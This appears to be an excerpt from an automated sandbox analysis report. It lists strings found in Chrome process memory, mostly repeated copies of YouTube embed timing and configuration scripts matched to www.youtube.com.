Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}",\"rk\",\"mk\"],[[[[\"c\"],[null,1],[null,0],[\"O43z0dpjhgX20SCx4KAo\"],[\"CLEn\"]],[null,800.1000000000058]]]],[\"/client_streamz/bg/po/csc\",null,[\"cs\",\"mk\"],[[[[null,2],[\"CLEn\"]],[1]]]],[\"/client_streamz/bg/po/ctav\",null,[\"av\",\"mk\"],[[[[\"m\"],[\"CLEn\"]],[1]]]]]]",null,null,null,null,null,null,14400,null,null,null,null,null,1]],"1747926392073"] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342874633.000028EC06378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}95078]]"],null,null,null,null,1]],"1747926392079"] equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319886197.000028EC06310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}to" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2319886197.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false});\n document.querySelector('head').appendChild(style);\n\n if (userButtonMinWidth) {\n const userButtonStyle = document.createElement('style');\n userButtonStyle.textContent = `#toolbar-item-user {min-width: ` + userButtonMinWidth +`px;}`\n document.querySelector('head').appendChild(userButtonStyle);\n }\n }\n }\n document.querySelector('html').classList.add(...classesToAdd);\n})();","currentUrl":"https://fountainofhealth.ca/en","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}1104 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}` equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
